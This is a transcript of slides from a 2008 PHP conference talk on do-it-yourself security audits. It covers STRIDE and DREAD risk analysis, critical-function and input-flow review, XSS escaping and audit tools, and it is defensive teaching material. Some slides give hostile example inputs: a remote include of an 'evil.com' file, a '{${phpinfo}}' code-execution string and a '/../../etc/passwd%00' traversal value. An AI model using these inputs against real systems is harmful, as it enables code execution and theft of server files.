Recomendados
Recomendados
Más contenido relacionado
La actualidad más candente
La actualidad más candente (20)
Similar a Do it-yourself-audits
Similar a Do it-yourself-audits (20)
Más de Johann-Peter Hartmann
Más de Johann-Peter Hartmann (20)
Do it-yourself-audits
- 1. Do-It-Yourself Audits Dutch PHP Conference Amsterdam 2008
- 2. The bald guy in the front
- 3. The bald guy in the front Johann-Peter Hartmann Full-time PHP Developer since 3.0.4 loves LAMP the great people, it‘s fun. Security is just fun CTO and Founder of Mayflower GmbH CEO of SektionEins GmbH
- 4. Our Business Model Mayflower GmbH : Create insecure Software
- 5. Our Business Model Mayflower GmbH : Create insecure Software SektionEins GmbH : Fix it
- 6. Our Business Model Mayflower GmbH : Create insecure Software SektionEins GmbH : Fix it = Get paid twice.
- 7. Agenda State of Security for PHP Risk Analysis White Box Audits Input flow analysis Tools to help you
- 10. 33 % 67 % Profit Fun Source: Breach 2007
- 11. 3 % 3 % 1 %1 % 3 % 8 % 42 % 15 % Information theft Defacement Malware Unknown Fraud 23 % Blackmail Link Spam Worms Source: Breach 2007 Phishing Information Warfare
- 12. 2 % 3 % 2 % 2 % 20 % 3 % 3 % 3 % 8 % SQL Injection 17 % Information Disclosure 10 % Known Exploits XSS Missing Authentication 12 % Guessing of Logins/Sessions 15 % OS Code Execution Wrong configurations Missing Anti-Automation Denial Of Service Redirect Source: NSI 2006 Wrong Session-Timeout CSRF
- 13. Risk Analysis
- 14. Why do it, anyway? Best way: verify the whole application Second best: audit the whole source code Average: 2000 LOC/Day More than one year for a 500.000 LOC application. Marco just told me that he got a 3.000.000 LOC application
- 15. Better not audit everything.
- 16. Check Data Flows for STRIDE Check every data exchange point for
- 17. Check Data Flows for STRIDE Check every data exchange point for Spoofing ( Fake Referer, Stolen Session Ids)
- 18. Check Data Flows for STRIDE Check every data exchange point for Spoofing ( Fake Referer, Stolen Session Ids) Tampering (XSS, CSRF)
- 19. Check Data Flows for STRIDE Check every data exchange point for Spoofing ( Fake Referer, Stolen Session Ids) Tampering (XSS, CSRF) Repudiation (identy theft, identy coverage)
- 20. Check Data Flows for STRIDE Check every data exchange point for Spoofing ( Fake Referer, Stolen Session Ids) Tampering (XSS, CSRF) Repudiation (identy theft, identy coverage) Information Disclosure (SQL-Injections, XSS, ...)
- 21. Check Data Flows for STRIDE Check every data exchange point for Spoofing ( Fake Referer, Stolen Session Ids) Tampering (XSS, CSRF) Repudiation (identy theft, identy coverage) Information Disclosure (SQL-Injections, XSS, ...) Denial of service (Logout after 3 failed logins)
- 22. Check Data Flows for STRIDE Check every data exchange point for Spoofing ( Fake Referer, Stolen Session Ids) Tampering (XSS, CSRF) Repudiation (identy theft, identy coverage) Information Disclosure (SQL-Injections, XSS, ...) Denial of service (Logout after 3 failed logins) Elevation of Privileges (Code executions ...)
- 23. How to Analyze Risks
- 24. How to Analyze Risks External Entities: Spoofing, Repudiation
- 25. How to Analyze Risks Processes: Spoofing, Tampering, Repudiation, Information Disclosure, DoS, Elevation of Privileges
- 26. How to Analyze Risks Database: Tampering, Information Disclosure, DoS
- 27. How to Analyze Risks Data flow: Tampering, Information Disclosure, DoS
- 28. How to Analyze Risks
- 29. Now what‘s the absolute risk? Check out the DREAD for every risk: Damage Potential Reproducability Exploitablitity Affected Users Discoverability
- 31. Where start auditing? risk = chance of attack * damage potential
- 32. Where start auditing? risk = chance of attack * damage potential High risk example: SQL-Injection in a Login Form
- 34. Tools needed for manual Source Code Audits Some people say: you just need „grep“ A decent Code Browser with syntax highlightening good code navigation Dynamic Code Analysis: Debugger with Step Thru Variable Introspection, Conditional Breakpoints
- 35. Critical Function Analysis Some functions are more dangerous than other methods. Every exploit class got its own set of functions think of: SQL Injections, Code Executions So just search for every critical function and check if the parameters are escaped correctly
- 36. SQL Injections Functions: mysql_query, mysqli_query, pdo::query, ... Your own database abstraction layer What to check Are the parameters correctly escaped? Even numbers, sort orders and directions? Table and Column names? look out for proper escaping of values, column names and sort orders etc
- 37. Code Executions Functions: eval(), create_function(), preg_replace with modifier e, usort, uasort, *_callback functions Written and included code: Templates in Smarty Cache data Look out for: (external) variables in php-code Strings can contain code executions! “{${phpinfo}}“
- 38. Code Inclusions Functions (include|require)[_once] Local: include “/var/log/http/access.log“ with my referer Remote: include “http://evil.com/hack.gif“ Other: “ftp://..“, “php://input...“, “data://...“ allow_url_fopen does not protect against data and php!
- 39. Shell Executions Functions: shell_exec (BackTicks!), exec(), system(), popen(), passthru() mail()! binary name and arguments need to be escaped Check for existance of escape_shell_cmd and escape_shell_args
- 40. Information leakage Functions: fopen(), fread(), file(), ... Vulnerabilities: read local files containing database passwords read intranet URLs read local server configuration files Check for injection of „/../../etc/passwd%00“
- 41. Input Flow Analysis Check the way that variables take inside the application Faster than a critical function analysis PHP accepts every external variable by default The variables are from an untrusted environment As soon PHP got a taint mode, PHP does help you a lot
- 42. Input Flow Analysis $_GET, $_POST, $_COOKIE some $_SERVER variables! Don‘t trust $HTTP_HOST. register_globals makes it hard to follow Check if external variables or results of them are used in critical functions
- 43. XSS: Output Escaping check Check for every place where data is delivered to the user There are 5 different versions of escaping for XSS
- 44. XSS: Output Escaping check Check for every place where data is delivered to the user There are 5 different versions of escaping for XSS Text: htmlentities()
- 45. XSS: Output Escaping check Check for every place where data is delivered to the user There are 5 different versions of escaping for XSS Text: htmlentities() Attributes: htmlspecialchars()
- 46. XSS: Output Escaping check Check for every place where data is delivered to the user There are 5 different versions of escaping for XSS Text: htmlentities() Attributes: htmlspecialchars() URLs: urlencode()
- 47. XSS: Output Escaping check Check for every place where data is delivered to the user There are 5 different versions of escaping for XSS Text: htmlentities() Attributes: htmlspecialchars() URLs: urlencode() JavaScript- and Stylesheet-Strings: addcslashes()
- 48. XSS: Output Escaping check Check for every place where data is delivered to the user There are 5 different versions of escaping for XSS Text: htmlentities() Attributes: htmlspecialchars() URLs: urlencode() JavaScript- and Stylesheet-Strings: addcslashes() HTML: Whitelist-Filters like htmlpurifier
- 49. Tools for Static Analysis RATS: http://www.fortifysoftware.com/security- resources/rats.jsp finds simple bugs like TOCTOU PHP-SAT http://www.program-transformation.org/ PHP/PhpSat got a freely definable set of rules for security checks Armorize CodeSecure http://www.armorize.com/ HyperSource, Fortify
- 50. Other tools XSSS for automated XSS search http://www.sven.de/XSSS A lot of other web security scanners SPIDynamics WebInspect NStalker Chorizo does PHP gray box scanning .. a lot more
- 51. Summary Even if you have time to do a full code review use risk analysis to focus Code review: Use critical function analysis and output check or input flow analysis Tools can help you, but they don‘t do your job
- 52. Questions?
- 53. Questions? Contact me at: johann-peter.hartmann@sektioneins.de
Notas del editor
- \n
- Formally i am the boss of stefan esser. I am not sure if he knows it, though. \n\n
- \n
- \n
- \n
- \n
- \n
- A database is 40.000 Bugs. Any database.\n
- Message: The number one target is information theft. \n
- Don‘t care about XSS, care about SQL injection first. \n
- That‘s something that banking or insurance companies do. Security Experts for real world security do it, and so does the microsoft security development lifecycle.\n
- So in six years time stefan would be able to tell marco „Look, there has been a bug“\n
- What to audit: are there money issues? privacy issues? are children involved? sexual preferences? \n
- Actually that‘s a term microsoft coined \n
- Actually that‘s a term microsoft coined \n
- Actually that‘s a term microsoft coined \n
- Actually that‘s a term microsoft coined \n
- Actually that‘s a term microsoft coined \n
- Actually that‘s a term microsoft coined \n
- Actually that‘s a term microsoft coined \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- Find easy to find vulnerabilities, \nidentify parts of code involved in highly critical workflows\n
- Find easy to find vulnerabilities, \nidentify parts of code involved in highly critical workflows\n
- White box audits\n
- Basically you need an IDE for hacking! Like Zend IDE, PDT\n
- \n
- Parameter binding does just help 80% for sql injection!\n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n
- \n